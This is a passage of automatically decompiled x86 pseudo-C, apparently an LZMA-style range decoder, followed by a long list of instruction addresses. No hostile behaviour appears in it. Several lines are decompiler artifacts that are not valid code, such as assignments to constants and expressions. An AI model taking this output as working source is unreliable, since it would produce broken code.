												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                            0x00000000
                                                            0x0040711c
                                                            0x0040711c
                                                            0x00407120
                                                            0x0040712d
                                                            0x00407137
                                                            0x00000000
                                                            0x00407122
                                                            0x00407122
                                                            0x0040715d
                                                            0x00407160
                                                            0x00407163
                                                            0x00407166
                                                            0x00407166
                                                            0x00407169
                                                            0x00407170
                                                            0x00407175
                                                            0x00407056
                                                            0x00407059
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073ce
                                                            0x004073ce
                                                            0x004073ce
                                                            0x004073d4
                                                            0x004073da
                                                            0x004073e0
                                                            0x004073fa
                                                            0x004073fd
                                                            0x00407403
                                                            0x0040740e
                                                            0x00407410
                                                            0x004073e2
                                                            0x004073e2
                                                            0x004073f1
                                                            0x004073f5
                                                            0x004073f5
                                                            0x0040741a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040741c
                                                            0x00407420
                                                            0x004075cf
                                                            0x004075e5
                                                            0x004075ed
                                                            0x004075f4
                                                            0x004075f6
                                                            0x004075fd
                                                            0x00407601
                                                            0x00407601
                                                            0x0040742c
                                                            0x00407433
                                                            0x0040743b
                                                            0x0040743e
                                                            0x00407441
                                                            0x00407441
                                                            0x00407447
                                                            0x00407447
                                                            0x00406be3
                                                            0x00406be3
                                                            0x00406be3
                                                            0x00406bec
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bf2
                                                            0x00000000
                                                            0x00406bfd
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c06
                                                            0x00406c09
                                                            0x00406c0c
                                                            0x00406c10
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c16
                                                            0x00406c19
                                                            0x00406c1b
                                                            0x00406c1c
                                                            0x00406c1f
                                                            0x00406c21
                                                            0x00406c22
                                                            0x00406c24
                                                            0x00406c27
                                                            0x00406c2c
                                                            0x00406c31
                                                            0x00406c3a
                                                            0x00406c4d
                                                            0x00406c50
                                                            0x00406c5c
                                                            0x00406c84
                                                            0x00406c86
                                                            0x00406c94
                                                            0x00406c94
                                                            0x00406c98
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c88
                                                            0x00406c88
                                                            0x00406c8b
                                                            0x00406c8c
                                                            0x00406c8c
                                                            0x00000000
                                                            0x00406c88
                                                            0x00406c62
                                                            0x00406c67
                                                            0x00406c67
                                                            0x00406c70
                                                            0x00406c78
                                                            0x00406c7b
                                                            0x00000000
                                                            0x00406c81
                                                            0x00406c81
                                                            0x00000000
                                                            0x00406c81
                                                            0x00000000
                                                            0x00406c9e
                                                            0x00406c9e
                                                            0x00406ca2
                                                            0x0040754e
                                                            0x00000000
                                                            0x0040754e
                                                            0x00406cab
                                                            0x00406cbb
                                                            0x00406cbe
                                                            0x00406cc1
                                                            0x00406cc1
                                                            0x00406cc1
                                                            0x00406cc4
                                                            0x00406cc8
                                                            0x00000000
                                                            0x00000000
                                                            0x00406cca
                                                            0x00406cd0
                                                            0x00406cfa
                                                            0x00406d00
                                                            0x00406d07
                                                            0x00000000
                                                            0x00406d07
                                                            0x00406cd6
                                                            0x00406cd9
                                                            0x00406cde
                                                            0x00406cde
                                                            0x00406ce9
                                                            0x00406cf1
                                                            0x00406cf4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d39
                                                            0x00406d3f
                                                            0x00406d42
                                                            0x00406d4f
                                                            0x00406d57
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d0e
                                                            0x00406d0e
                                                            0x00406d12
                                                            0x0040755d
                                                            0x00000000
                                                            0x0040755d
                                                            0x00406d1e
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d2c
                                                            0x00406d2f
                                                            0x00406d32
                                                            0x00406d37
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004073ce
                                                            0x004073ce
                                                            0x004073d4
                                                            0x004073da
                                                            0x004073e0
                                                            0x004073fa
                                                            0x004073fd
                                                            0x00407403
                                                            0x0040740e
                                                            0x00407410
                                                            0x004073e2
                                                            0x004073e2
                                                            0x004073f1
                                                            0x004073f5
                                                            0x004073f5
                                                            0x0040741a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d5f
                                                            0x00406d61
                                                            0x00406d64
                                                            0x00406dd5
                                                            0x00406dd8
                                                            0x00406ddb
                                                            0x00406de2
                                                            0x00406dec
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00406d66
                                                            0x00406d6a
                                                            0x00406d6d
                                                            0x00406d6f
                                                            0x00406d72
                                                            0x00406d75
                                                            0x00406d77
                                                            0x00406d7a
                                                            0x00406d7c
                                                            0x00406d81
                                                            0x00406d84
                                                            0x00406d87
                                                            0x00406d8b
                                                            0x00406d92
                                                            0x00406d95
                                                            0x00406d9c
                                                            0x00406da0
                                                            0x00406da8
                                                            0x00406da8
                                                            0x00406da8
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406dac
                                                            0x00406daf
                                                            0x00406dcd
                                                            0x00406dcf
                                                            0x00000000
                                                            0x00406db1
                                                            0x00406db1
                                                            0x00406db4
                                                            0x00406db7
                                                            0x00406dba
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbf
                                                            0x00406dc2
                                                            0x00406dc4
                                                            0x00406dc5
                                                            0x00406dc8
                                                            0x00000000
                                                            0x00406dc8
                                                            0x00000000
                                                            0x00406ffe
                                                            0x00407002
                                                            0x00407020
                                                            0x00407023
                                                            0x0040702a
                                                            0x0040702d
                                                            0x00407030
                                                            0x00407033
                                                            0x00407036
                                                            0x00407039
                                                            0x0040703b
                                                            0x00407042
                                                            0x00407043
                                                            0x00407045
                                                            0x00407048
                                                            0x0040704b
                                                            0x0040704e
                                                            0x0040704e
                                                            0x00407053
                                                            0x00000000
                                                            0x00407053
                                                            0x00407004
                                                            0x00407007
                                                            0x0040700a
                                                            0x00407014
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x00000000
                                                            0x00407068
                                                            0x0040706c
                                                            0x0040708f
                                                            0x00407092
                                                            0x00407095
                                                            0x0040709f
                                                            0x0040706e
                                                            0x0040706e
                                                            0x00407071
                                                            0x00407074
                                                            0x00407077
                                                            0x00407084
                                                            0x00407087
                                                            0x00407087
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x00000000
                                                            0x004070ab
                                                            0x004070af
                                                            0x00000000
                                                            0x00000000
                                                            0x004070b5
                                                            0x004070b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004070bf
                                                            0x004070c1
                                                            0x004070c5
                                                            0x004070c5
                                                            0x004070c8
                                                            0x004070cc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407143
                                                            0x00407147
                                                            0x0040714e
                                                            0x00407151
                                                            0x00407154
                                                            0x00407149
                                                            0x00407149
                                                            0x00407149
                                                            0x00407157
                                                            0x0040715a
                                                            0x00000000
                                                            0x00000000
                                                            0x00407203
                                                            0x00407203
                                                            0x00407207
                                                            0x004075a5
                                                            0x00000000
                                                            0x004075a5
                                                            0x0040720d
                                                            0x00407210
                                                            0x00407213
                                                            0x00407217
                                                            0x0040721a
                                                            0x00407220
                                                            0x00407222
                                                            0x00407222
                                                            0x00407222
                                                            0x00407225
                                                            0x00407228
                                                            0x00000000
                                                            0x00000000
                                                            0x00406df8
                                                            0x00406df8
                                                            0x00406dfc
                                                            0x00407569
                                                            0x00000000
                                                            0x00407569
                                                            0x00406e02
                                                            0x00406e05
                                                            0x00406e08
                                                            0x00406e0c
                                                            0x00406e0f
                                                            0x00406e15
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e1a
                                                            0x00406e1d
                                                            0x00406e1d
                                                            0x00406e20
                                                            0x00406e23
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e29
                                                            0x00406e2f
                                                            0x00000000
                                                            0x00000000
